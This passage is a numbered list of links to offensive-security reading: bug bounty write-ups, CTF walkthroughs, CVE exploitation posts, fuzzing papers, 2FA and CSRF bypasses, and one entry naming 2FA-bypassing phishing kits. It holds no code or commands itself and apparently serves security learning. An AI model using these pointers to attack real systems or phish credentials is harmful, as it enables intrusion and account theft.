https://medium.com/@Tib3rius/59-hosts-to-glory-passing-the-oscp-acf0fd384371
-2103-Can We Automate Bug Bounties With Wfuzz?
medium.com/better-programming/can-we-automate-earning-bug-bounties-with-wfuzz-c4e7a96810a5
-2104-Advanced boolean-based SQLi filter bypass techniques:
https://www.secjuice.com/advanced-sqli-waf-bypass/
-2105-Beginners Guide On How You Can Use Javascript In BugBounty:
https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea
-2106-OTP Bypass:
medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89
-2107-How we Hijacked 26+ Subdomains:
https://medium.com/@aishwaryakendle/how-we-hijacked-26-subdomains-9c05c94c7049
-2018-How to spot and exploit postMessage vulnerablities:
https://medium.com/bugbountywriteup/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc
-2119-IDA Pro Tips to Add to Your Bag of Tricks:
https://swarm.ptsecurity.com/ida-pro-tips/
-2120-N1QL Injection: Kind of SQL Injection in a NoSQL Database:
https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database/
-2121-CSRF Protection Bypass in Play Framework:
https://blog.doyensec.com/2020/08/20/playframework-csrf-bypass.html
-2122-$25K Instagram Almost XSS Filter Link — Facebook Bug Bounty:
https://medium.com/@alonnsoandres/25k-instagram-almost-xss-filter-link-facebook-bug-bounty-798b10c13b83
-2123-techniques for learning passwords:
https://rootkitpen.blogspot.com/2020/09/techniques-for-learning-passwords.html
-2124-How a simple CSRF attack turned into a P1:
https://ladysecspeare.wordpress.com/2020/04/05/how-a-simple-csrf-attack-turned-into-a-p1-level-bug/
-2125-How I exploited the json csrf with method override technique:
https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0
-2126-How I found CSRF(my first bounty):
https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d
-2127-Exploiting websocket application wide XSS and CSRF:
https://medium.com/@osamaavvan/exploiting-websocket-application-wide-xss-csrf-66e9e2ac8dfa
-2128-Touch ID authentication Bypass on evernote and dropbox iOS apps:
https://medium.com/@pig.wig45/touch-id-authentication-bypass-on-evernote-and-dropbox-ios-apps-7985219767b2
-2129-Oauth authentication bypass on airbnb acquistion using wierd 1 char open redirect:
https://xpoc.pro/oauth-authentication-bypass-on-airbnb-acquisition-using-weird-1-char-open-redirect/
-2130-Two factor authentication bypass:
https://gauravnarwani.com/two-factor-authentication-bypass/
-2132-Tricky oracle SQLI situation:
https://blog.yappare.com/2020/04/tricky-oracle-sql-injection-situation.html
-2133-CORS bug on google’s 404 page (rewarded):
https://medium.com/@jayateerthag/cors-bug-on-googles-404-page-rewarded-2163d58d3c8b
-2134-Subdomain takeover via unsecured s3 bucket:
https://blog.securitybreached.org/2018/09/24/subdomain-takeover-via-unsecured-s3-bucket/
-2135-Subdomain takeover via wufoo service:
https://www.mohamedharon.com/2019/02/subdomain-takeover-via-wufoo-service-in.html
-2136-How I found CSRF(my first bounty):
https://medium.com/@rajeshranjan457/how-i-csrfd-my-first-bounty-a62b593d3f4d
-2137-Race condition that could result to RCE a story with an app:
https://medium.com/bugbountywriteup/race-condition-that-could-result-to-rce-a-story-with-an-app-that-temporary-stored-an-uploaded-9a4065368ba3
-2138-Creating thinking is our everything : Race condition and business logic:
https://medium.com/@04sabsas/bugbounty-writeup-creative-thinking-is-our-everything-race-condition-business-logic-error-2f3e82b9aa17
-2139-Chaining improper authorization to Race condition to harvest credit card details:
https://medium.com/@ciph3r7r0ll/chaining-improper-authorization-to-race-condition-to-harvest-credit-card-details-a-bug-bounty-effe6e0f5076
-2140-Google APIs Clickjacking worth 1337$:
https://medium.com/@godofdarkness.msf/google-apis-clickjacking-1337-7a3a9f3eb8df
-2141-Bypass CSRF with clickjacking on Google org:
https://medium.com/@saadahmedx/bypass-csrf-with-clickjacking-worth-1250-6c70cc263f40
-2142-2FA Bypass via logical rate limiting Bypass:
https://medium.com/@jeppe.b.weikop/2fa-bypass-via-logical-rate-limiting-bypass-25ae2a4e1835
-2143-OTP bruteforce account takeover:
https://medium.com/@ranjitsinghnit/otp-bruteforce-account-takeover-faaac3d712a8
-2144-Microsoft RCE bugbounty:
https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/
-2145-Bug Bounty Tips #1:
https://www.infosecmatter.com/bug-bounty-tips-1/
-2146-Bug Bounty Tips #2:
https://www.infosecmatter.com/bug-bounty-tips-2-jun-30/
-2147-Bug Bounty Tips #3:
https://www.infosecmatter.com/bug-bounty-tips-3-jul-21/
-2148-Bug Bounty Tips #4:
https://www.infosecmatter.com/bug-bounty-tips-4-aug-03/
-2149-Bug Bounty Tips #5:
https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/
-2150-Bug Bounty Tips #6:
https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/
-2151-Finding Bugs in File Systems with an Extensible Fuzzing Framework ﴾TOS 2020﴿:
https://wcventure.github.io/FuzzingPaper/Paper/TOS20_FileSys.pdf
-2152-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿:
https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf
-2153-Bug Bounty Tips #7:
https://www.infosecmatter.com/bug-bounty-tips-7-sep-27/
-2154-Fuzzing: Hack, Art, and Science ﴾CACM 2020﴿:
https://wcventure.github.io/FuzzingPaper/Paper/CACM20_Fuzzing.pdf
-2155-Azure File Shares for Pentesters:
https://blog.netspi.com/azure-file-shares-for-pentesters/
-2156-XSS like a Pro:
https://www.hackerinside.me/2019/12/xss-like-pro.html
-2157-XSS on Cookie Pop-up Warning:
https://vict0ni.me/bug-hunting-xss-on-cookie-popup-warning/
-2158-Effortlessly finding Cross Site Script Inclusion (XSSI) & JSONP for bug bounty:
https://medium.com/bugbountywriteup/effortlessly-finding-cross-site-script-inclusion-xssi-jsonp-for-bug-bounty-38ae0b9e5c8a
-2159-XSS in Zoho Mail:
https://www.hackerinside.me/2019/09/xss-in-zoho-mail.html
-2160-Overview Of Empire 3.4 Features:
https://www.bc-security.org/post/overview-of-empire-3-4-features/
-2161-Android App Source code Extraction and Bypassing Root and SSL Pinning checks:
https://vj0shii.info/android-app-testing-initial-steps/
-2162-The 3 Day Account Takeover:
https://medium.com/@__mr_beast__/the-3-day-account-takeover-269b0075d526
-2163-A Review of Fuzzing Tools and Methods:
https://wcventure.github.io/FuzzingPaper/Paper/2017_review.pdf
-2164-PeriScope: An Effective Probing and Fuzzing Framework for the Hardware‐OS Boundary ﴾NDSS2019﴿:
https://wcventure.github.io/FuzzingPaper/Paper/NDSS19_PeriScope.pdf
-2165-Oneplus XSS vulnerability in customer support portal:
https://medium.com/@tech96bot/oneplus-xss-vulnerability-in-customer-support-portal-d5887a7367f4
-2166-Windows-Privilege-Escalation-Resources:
https://medium.com/@aswingovind/windows-privilege-escalation-resources-d35dca8444de
-2167-Persistence – DLL Hijacking:
https://pentestlab.blog/page/5/
-2168-Scanning JS Files for Endpoints and Secrets:
https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
-2169-Password Spraying Secure Logon for F5 Networks:
https://www.n00py.io/2020/08/password-spraying-secure-logon-for-f5-networks/
-2170-Password Spraying Dell SonicWALL Virtual Office:
https://www.n00py.io/2019/12/password-spraying-dell-sonicwall-virtual-office/
-2171-Attention to Details : Finding Hidden IDORs:
https://medium.com/@aseem.shrey/attention-to-details-a-curious-case-of-multiple-idors-5a4417ba8848
-2172-Bypassing file upload filter by source code review in Bolt CMS:
https://stazot.com/boltcms-file-upload-bypass/
-2173-HTB{ Giddy }:
https://epi052.gitlab.io/notes-to-self/blog/2019-02-09-hack-the-box-giddy/
-2174-Analyzing WhatsApp Calls with Wireshark, radare2 and Frida:
https://movaxbx.ru/2020/02/11/analyzing-whatsapp-calls-with-wireshark-radare2-and-frida/
-2175-2FA bypass via CSRF attack:
https://medium.com/@vbharad/2-fa-bypass-via-csrf-attack-8f2f6a6e3871
-2176-CSRF token bypass [a tale of 2k bug]:
https://medium.com/@sainttobs/csrf-token-bypasss-a-tale-of-my-2k-bug-ff7f51166ea1
-2177-Setting the ‘Referer’ Header Using JavaScript:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/
-2178-Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass & GitHub Actions secrets:
https://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/
-2179-Stored XSS on Zendesk via Macro’s PART 2:
https://medium.com/@hariharan21/stored-xss-on-zendesk-via-macros-part-2-676cefee4616
-2180-Azure Account Hijacking using mimikatz’s lsadump::setntlm:
https://www.trustedsec.com/blog/azure-account-hijacking-using-mimikatzs-lsadumpsetntlm/
-2181-CORS misconfiguration account takeover out of scope to grab items in scope:
https://medium.com/@mashoud1122/cors-misconfiguration-account-takeover-out-of-scope-to-grab-items-in-scope-66d9d18c7a46
-2182-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿:
https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf
https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf
-2183-Facebook Bug bounty : How I was able to enumerate
instagram accounts who had enabled 2FA:
https://medium.com/@zk34911/facebook-bug-bounty-how-i-was-able-to-enumerate-instagram-accounts-who-had-enabled-2fa-two-step-fddba9e9741c
-2184-Bypass hackerone 2FA:
https://medium.com/japzdivino/bypass-hackerone-2fa-requirement-and-reporter-blacklist-46d7959f1ee5
-2185-How I abused 2FA to maintain persistence after password recovery change google microsoft instragram:
https://medium.com/@lukeberner/how-i-abused-2fa-to-maintain-persistence-after-a-password-change-google-microsoft-instagram-7e3f455b71a1
-2186-How I hacked 40k user accounts of microsoft using 2FA bypass outlook:
https://medium.com/@goyalvartul/how-i-hacked-40-000-user-accounts-of-microsoft-using-2fa-bypass-outlook-live-com-13258785ec2f
-2187-How to bypass 2FA with a HTTP header:
https://medium.com/@YumiSec/how-to-bypass-a-2fa-with-a-http-header-ce82f7927893
-2188-Building a custom Mimikatz binary:
https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
-2189-Self XSS to Good XSS:
https://medium.com/@arbazhussain/self-xss-to-good-xss-clickjacking-6db43b44777e
-2190-DOM based XSS or why you should not rely on cloudflare too much:
https://medium.com/bugbountywriteup/dom-based-xss-or-why-you-should-not-rely-on-cloudflare-too-much-a1aa9f0ead7d
-2191-Reading internal files using SSRF vulnerability:
https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb
-2192-Latest web hacking tools:
https://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2020
-2193-Cross-Site Scripting (XSS) Cheat Sheet - 2020 Edition:
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
-2194-Hijacking a Domain Controller with Netlogon RPC (aka Zerologon: CVE-2020-1472):
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hijacking-a-domain-controller-with-netlogon-rpc-aka-zerologon-cve-2020-1472/
-2195-How I got 1200+ Open S3 buckets…!:
https://medium.com/@mail4frnd.mohit/how-i-got-1200-open-s3-buckets-aec347ea2a1e
-2196-Open Sesame: Escalating Open Redirect to RCE with Electron Code Review:
https://spaceraccoon.dev/open-sesame-escalating-open-redirect-to-rce-with-electron-code-review
-2197-When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number:
https://mango.pdf.zone/finding-former-australian-prime-minister-tony-abbotts-passport-number-on-instagram
-2198-HTB{ Vault }:
https://epi052.gitlab.io/notes-to-self/blog/2018-11-04-hack-the-box-vault/
-2199-HTB{ ellingson }:
https://epi052.gitlab.io/notes-to-self/blog/2019-09-29-hack-the-box-ellingson/
-2200-HTB{ Swagshop }:
https://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/
-2201-Evading Firewalls with Tunnels:
https://michiana-infosec.com/evading-firewalls-with-tunnels/
-2202-How to Geolocate Mobile Phones (or not):
https://keyfindings.blog/2020/07/12/how-to-geolocate-mobile-phones-or-not/
-2203-Web application race conditions: It’s not just for binaries:
https://blog.pucarasec.com/2020/07/06/web-application-race-conditions-its-not-just-for-binaries/
-2204-Two-Factor Authentication Bypass:
https://gauravnarwani.com/two-factor-authentication-bypass/
-2205-Proxies, Pivots, and Tunnels – Oh My! :
https://blog.secureideas.com/2020/10/proxies_pivots_tunnels.html
-2206-Let's Debug Together: CVE-2020-9992:
https://blog.zimperium.com/c0ntextomy-lets-debug-together-cve-2020-9992/
-2207-I Like to Move It: Windows Lateral Movement Part 3: DLL Hijacking:
https://www.mdsec.co.uk/2020/10/i-live-to-move-it-windows-lateral-movement-part-3-dll-hijacking/
-2208-Abusing Chrome's XSS auditor to steal tokens:
https://portswigger.net/research/abusing-chromes-xss-auditor-to-steal-tokens
-2209-ModSecurity, Regular Expressions and Disputed CVE-2020-15598:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity-regular-expressions-and-disputed-cve-2020-15598/
-2210-Bug Bounty Tips #8:
https://www.infosecmatter.com/bug-bounty-tips-8-oct-14/
-2211-IOS Pentesing Guide From A N00bs Perspective:
https://payatu.com/blog/abhilashnigam/ios-pentesing-guide-from-a-n00bs-perspective.1
-2212-Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning & Unicode byͥtes:
https://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%cd%a5tes/
-2213-We Hacked Apple for 3 Months: Here’s What We Found:
https://samcurry.net/hacking-apple/
-2214-Breaking JCaptcha using Tensorflow and AOCR:
https://www.gremwell.com/breaking-jcaptcha-tensorflow-aocr
-2215-Bug Bytes #82 - Timeless timing attacks, Grafana SSRF, Pizza & Youtube delicacie:
https://blog.intigriti.com/2020/08/05/bug-bytes-82-timeless-timing-attacks-grafana-ssrf-pizza-youtube-delicacies/
-2216-Bug Bytes #71 – 20K Facebook XSS, LevelUp 0x06 &Naffy’s Notes:
https://blog.intigriti.com/2020/05/20/bug-bytes-71-20k-facebook-xss-levelup-0x06-naffys-notes/
-2217-Bug Bytes #90 - The impossible XSS, Burp Pro tips & A millionaire on bug bounty and meditation:
https://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/
-2218-How to Find Vulnerabilities in Code: Bad Words:
https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words
-2219-Testing for WebSockets security vulnerabilities:
https://portswigger.net/web-security/websockets
-2220-Practical Web Cache Poisoning:
https://portswigger.net/research/practical-web-cache-poisoning
-2221-htb{ zipper }:
https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-zipper/
-2222-What is HTTP request smuggling? Tutorial & Examples:
https://portswigger.net/web-security/request-smuggling
-2223-When alert fails: exploiting transient events:
https://portswigger.net/research/when-alert-fails-exploiting-transient-events
-2224-BugPoC LFI Challeng:
https://hipotermia.pw/bb/bugpoc-lfi-challenge
-2225-Misc CTF - Request Smuggling:
https://hg8.sh/posts/misc-ctf/request-smuggling/
-2226-403 to RCE in XAMPP:
https://www.securifera.com/blog/2020/10/13/403-to-rce-in-xampp/
-2227-Phone numbers investigation, the open source way:
https://www.secjuice.com/phone-numbers-investigation-the-open-source-way/
-2228-Covert Web Shells in .NET with Read-Only Web Paths:
https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/
-2229-From Static Analysis to RCE:
https://blog.dixitaditya.com/from-android-app-to-rce/
-2230-GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty:
https://devcraft.io/2020/10/20/github-pages-multiple-rces-via-kramdown-config.html
-2231-Signed Binary Proxy Execution via PyCharm:
https://www.archcloudlabs.com/projects/signed_binary_proxy_execution/
-2232-Bug Bytes #93 - Discord RCE, Vulnerable HTML to PDF converters & DOMPurify bypass demystified :
https://blog.intigriti.com/2020/10/21/bug-bytes-93-discord-rce-vulnerable-html-to-pdf-converters-dompurify-bypass-demystified/
-2233-Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn & how best to approach it:
https://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/
-2234-Advanced Level Resources For Web Application Penetration Testing:
https://twelvesec.com/2020/10/19/advanced-level-resources-for-web-application-penetration-testing/
-2235-Pass-the-hash wifi:
https://sensepost.com/blog/2020/pass-the-hash-wifi/
-2236-HTML to PDF converters, can I hack them?:
https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903
-2237-Android adb reverse tethering mitm setup:
https://www.securify.nl/blog/android-adb-reverse-tethering-mitm-setup/
-2238-Typical Wi-Fi attacks:
https://splone.com/blog/2020/10/13/typical-wi-fi-attacks/
-2239-Burp suite “ninja moves”:
https://owasp.org/www-chapter-norway/assets/files/Burp%20suite%20ninja%20moves.pdf
-2240-Razzer: Finding Kernel Race Bugs through Fuzzing ﴾S&P 2019﴿:
Paper:https://wcventure.github.io/FuzzingPaper/Paper/SP19_Razzer.pdf
Code:https://github.com/compsec-snu/razzer
Slides:https://lifeasageek.github.io/papers/jeong-razzer-slides.pdf
-2241-MoonShine: Optimizing OS Fuzzer Seed Selection with Trace Distillation ﴾USENIX Security2018﴿:
Paper:https://wcventure.github.io/FuzzingPaper/Paper/USENIX18_MoonShine.pdf
-2242-Sequence directed hybrid fuzzing ﴾SANER 2020﴿:
Paper:https://wcventure.github.io/FuzzingPaper/Paper/SANER20_Sequence.pdf
-2243-Open Source Intelligence Tools And Resources Handbook 2020:
https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf
-2244-How to Find IP Addresses Owned by a Company:
https://securitytrails.com/blog/identify-ip-ranges-company-owns
-2245-What is Banner Grabbing? Best Tools and Techniques Explained:
https://securitytrails.com/blog/banner-grabbing
-2246-Recon Methods Part 4 – Automated OSINT:
https://www.redsiege.com/blog/2020/04/recon-methods-part-4-automated-osint/
-2247-Forcing Firefox to Execute XSS Payloads during 302 Redirects:
https://www.gremwell.com/firefox-xss-302
-2248-HTB{ Frolic }:
https://epi052.gitlab.io/notes-to-self/blog/2018-10-22-hack-the-box-frolic/
-2249-Identifying Vulnerabilities in SSL/TLS and Attacking them:
https://medium.com/bugbountywriteup/identifying-vulnerabilities-in-ssl-tls-and-attacking-them-e7487877619a
-2250-My First Bug Bounty Reward:
https://medium.com/bugbountywriteup/my-first-bug-bounty-reward-8fd133788407
-2251-2FA Bypass On Instagram Through A Vulnerable Endpoint:
https://medium.com/bugbountywriteup/2fa-bypass-on-instagram-through-a-vulnerable-endpoint-b092498af178
-2252-Automating XSS using Dalfox, GF and Waybackurls:
https://medium.com/bugbountywriteup/automating-xss-using-dalfox-gf-and-waybackurls-bc6de16a5c75
-2253-Think Outside the Scope: Advanced CORS Exploitation Techniques:
https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397
-2254-Intro to CTFs. Resources, advice and everything else:
https://medium.com/bugbountywriteup/intro-to-ctfs-164a03fb9e60
-2255-PowerShell Commands for Pentesters:
https://www.infosecmatter.com/powershell-commands-for-pentesters/
-2256-31k$ SSRF in Google Cloud Monitoring led to metadata exposure:
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
-2257-NAT Slipstreaming:
https://samy.pl/slipstream/
-2258-How i got 7000$ in Bug-Bounty for my Critical Finding:
https://medium.com/@noobieboy1337/how-i-got-7000-in-bug-bounty-for-my-critical-finding-99326d2cc1ce
-2259-SQL Injection Payload List:
https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b
-2260-Taking over multiple user accounts:
https://medium.com/bugbountywriteup/chaining-password-reset-link-poisoning-idor-account-information-leakage-to-achieve-account-bb5e0e400745
-2261-Bug Bytes #98 - Imagemagick's comeback, Treasure trove of wordlists, Advent of Cyber & How to get more hours in your day:
https://blog.intigriti.com/2020/11/25/bug-bytes-98-imagemagicks-comeback-treasure-trove-of-wordlists-advent-of-cyber-how-to-get-more-hours-in-your-day/
-2262-How to get root on Ubuntu 20.04 by pretending nobody’s /home:
https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
-2263-What is Shodan? Diving into the Google of IoT Devices:
https://securitytrails.com/blog/what-is-shodan
-2264-Purgalicious VBA: Macro Obfuscation With VBA Purging & OfficePurge:
https://www.fireeye.com/blog/threat-research/2020/11/purgalicious-vba-macro-obfuscation-with-vba-purging.html
https://github.com/fireeye/OfficePurge
-2265-Dynamic Invocation in .NET to bypass hooks:
https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/
-2266-NepHack Online CTF June 2020 Write-up:
https://www.askbuddie.com/blog/nephack-online-ctf-june-2020-write-up/
-2268-Attacking SCADA Part II::
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-scada-part-ii-vulnerabilities-in-schneider-electric-ecostruxure-machine-expert-and-m221-plc/
-2269-PENTESTING CHEATSHEET:
https://hausec.com/pentesting-cheatsheet
-2270-CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability:
http://blog.pi3.com.pl/?p=780
-2271-TShark Cheatsheet:
https://snippets.bentasker.co.uk/page-1909131238-TShark-Cheatsheet-BASH.html
-2272-Exploiting a “Simple” Vulnerability – In 35 Easy Steps or Less!:
https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/
-2273-Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox:
https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/
-2274-Exploiting CVE-2020-0041 - Part 2: Escalating to root:
https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
-2275-Exploiting MS16-145: MS Edge TypedArray.sort Use-After-Free (CVE-2016-7288):
https://blog.quarkslab.com/exploiting-ms16-145-ms-edge-typedarraysort-use-after-free-cve-2016-7288.html
-2276-Bug Bytes #99 – Bypassing bots and WAFs,JQ in Burp & Smarter JSON fuzzing and subdomain takeovers:
https://blog.intigriti.com/2020/12/02/bug-bytes-99-bypassing-bots-and-wafs-jq-in-burp-smarter-json-fuzzing-and-subdomain-takeovers/
-2277-Digging secrets from git repositories by using truffleHog:
https://redblueteam.wordpress.com/2020/01/04/digging-secrets-from-git-repositories-by-using-trufflehog
-2287-Apple Safari Pwn2Own 2018 Whitepaper:
https://labs.f-secure.com/assets/BlogFiles/apple-safari-pwn2own-vuln-write-up-2018-10-29-final.pdf
-2288-DISSECTING APT21 SAMPLES USING A STEP-BY-STEP APPROACH:
https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/
-2289-MITRE ATT&CK T1082 System Information Discovery:
https://www.picussecurity.com/resource/attck-t1082-system-information-discovery
-2290-A simple and fast Wireshark tutorial:
https://andregodinho1.medium.com/a-simple-and-fast-wireshark-tutorial-7d2b78a71820
-2291-Recon - My Way Or High Way:
https://shahjerry33.medium.com/recon-my-way-or-high-way-58a18dab5c95
-2292-Finding bugs at limited scope programs (Single Domain Websites):
https://dewcode.medium.com/finding-bugs-at-limited-scopes-programs-single-domain-websites-d3c2ff396edf
-2293-Passive intelligence gathering techniques:
https://medium.com/@agent_maximus/passive-intelligence-gathering-techniques-uncover-domains-subdomains-ip-addresses-a40f51ee0eb0
-2294-Android Pen-testing/Hunting 101:
https://medium.com/@noobieboy1337/android-pen-testing-hunting-101-dc0fecf90682
-2295-All MITM attacks in one place:
https://github.com/Sab0tag3d/MITM-cheatsheet
-2296-From Recon to Optimizing RCE Results:
https://medium.com/bugbountywriteup/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a
-2297-RCE on https://beta-partners.tesla.com due to CVE-2020-0618:
https://bugcrowd.com/disclosures/d23e05b1-c4cc-440a-a678-d8045468c902/rce-on-https-beta-partners-tesla-com-due-to-cve-2020-0618
-2298-Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641:
https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-1.html
-2299-Remote iPhone Exploitation Part 2: Bringing Light into the Darkness -- a Remote ASLR Bypass:
https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-2.html
-2300-Remote iPhone Exploitation Part 3: From Memory Corruption to JavaScript and Back -- Gaining Code Execution:
https://googleprojectzero.blogspot.com/2020/01/remote-iphone-exploitation-part-3.html
-2301-1000$ for Open redirect via unknown technique [BugBounty writeup]:
https://ruvlol.medium.com/1000-for-open-redirect-via-unknown-technique-675f5815e38a
-2302-Facebook SSRF:
https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5
-2303-Metasploit Tips and Tricks for HaXmas 2020:
https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/
-2304-SubDomain TakeOver ~ Easy WIN WIN:
https://amitp200.medium.com/subdomain-takeover-easy-win-win-6034bb4147f3
-2305-Recon Methodology :
https://github.com/Quikko/Recon-Methodology
-2306-h1-212 CTF Writeup:
https://gist.github.com/Corb3nik/aeb7c762bd4fec36436a0b5686651e69
-2307-exploiting-second-order-blind-sql-injection:
https://medium.com/bugbountywriteup/exploiting-second-order-blind-sql-injection-689e98f04daa
-2308-hunting-on-the-go-install-nethunter-on-unsupported-devices:
https://medium.com/bugbountywriteup/hunting-on-the-go-install-nethunter-on-unsupported-devices-dd01a4f30b6a
-2309-$10,000 for a vulnerability that doesn’t exist:
https://medium.com/@valeriyshevchenko/10-000-for-a-vulnerability-that-doesnt-exist-9dbc63684e94
-2310-Finding bugs on Chess.com:
https://medium.com/bugbountywriteup/finding-bugs-on-chess-com-739a71fbdb31
-2311-Each and every request make sense:
https://akshartank.medium.com/each-and-every-request-make-sense-4572b3205382
-2312-Exploiting Max. Character Limitation:
https://orthonviper.medium.com/exploiting-max-character-limitation-cde982545019
-2313-API based IDOR to leaking Private IP address of 6000 businesses:
https://rafi-ahamed.medium.com/api-based-idor-to-leaking-private-ip-address-of-6000-businesses-6bc085ac6a6f
-2314-Facebook bug Bounty -Finding the hidden members of the Vivek ps private events:
https://vivekps143.medium.com/facebook-bug-bounty-finding-the-hidden-members-of-the-private-events-977dc1784ff9
-2315-IoT Vulnerability Assessment of the Irish IP Address Space:
https://f5.com/labs/articles/threat-intelligence/iot-vulnerability-assessment-of-the-irish-ip-address-space
-2316-Facebook bug bounty (500 USD) :A blocked fundraiser organizer would be unable to view or remove themselves from the fundraiser
https://medium.com/bugbountywriteup/facebook-bug-bounty-500-usd-a-blocked-fundraiser-organizer-would-be-unable-to-view-or-remove-5da9f86d2fa0
-2317-This is how I was able to view anyone’s private email and birthday on Instagram:
https://saugatpokharel.medium.com/this-is-how-i-was-able-to-view-anyones-private-email-and-birthday-on-instagram-1469f44b842b
-2138-My Bug Bounty Journey and My First Critical Bug — Time Based Blind SQL Injection:
https://marxchryz.medium.com/my-bug-bounty-journey-and-my-first-critical-bug-time-based-blind-sql-injection-aa91d8276e41
-2139-JavaScript analysis leading to Admin portal access:
https://rikeshbaniyaaa.medium.com/javascript-analysis-leading-to-admin-portal-access-ea30f8328c8e
-2140-SCADA hacker's toolset:
https://scadahacker.com/tools.html
-2141-red team phishing:
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki#phishing-setup
-2142-Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies:
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
-2143-Stored XSS in icloud.com:
https://vbharad.medium.com/stored-xss-in-icloud-com-5000-998b8c4b2075
-2144-20 Common Tools & Techniques Used by macOS Threat Actors & Malware:
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-2145-Error-Based SQL Injection on a WordPress website and extract more than 150k user details:
https://ynoof.medium.com/error-based-sql-injection-on-a-wordpress-website-and-extract-more-than-150k-user-details-f65f987c2cc0
-2146-Scope Based Recon Methodology: Exploring Tactics for Smart Recon:
https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5
-2147-Hail Frida!! The Universal SSL pinning bypass for Android applications:
https://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-e9e1d733d29
-2148-Common Tools & Techniques Used By Threat Actors and Malware — Part I :
https://infosecwriteups.com/common-tools-techniques-used-by-threat-actors-and-malware-part-i-deb05b664879
-2149-Common Tools & Techniques Used By Threat Actors and Malware — Part II:
https://nasbench.medium.com/common-tools-techniques-used-by-threat-actors-and-malware-part-ii-c2e65cd6b084
-2150-Tools designed to automate phishing attacks that are intended to bypass 2FA:
evilginx2: https://lnkd.in/emMu_mN
Modlishka: https://lnkd.in/gvGc-kZ
KoiPhish: https://lnkd.in/dwzavJr
ReelPhish https://lnkd.in/gjs_aC8
CredSniper:https://lnkd.in/g-jzK4y
Muraena:https://lnkd.in/d2M53cs
-2151-Digital Forensic Tools
https://github.com/ivbeg/awesome-forensicstools/
-2152-Netcat Cheat Sheet:
https://www.linkedin.com/posts/ammaramer_netcat-cheat-sheet-1-banner-grabbing-activity-6780201567527165953-bEbb
-2153-Web App Hacking Methodology:
https://twitter.com/cry__pto/status/1374625813404999686
-2154-Penetration Testing MindMap:
https://twitter.com/cry__pto/status/1375170618501562368
-2155-Hacking Concept and Fundamentals:
https://twitter.com/cry__pto/status/1376615352466046976
-2156-Social Media Osint Tools:
https://twitter.com/cry__pto/status/1382323944833875970
|
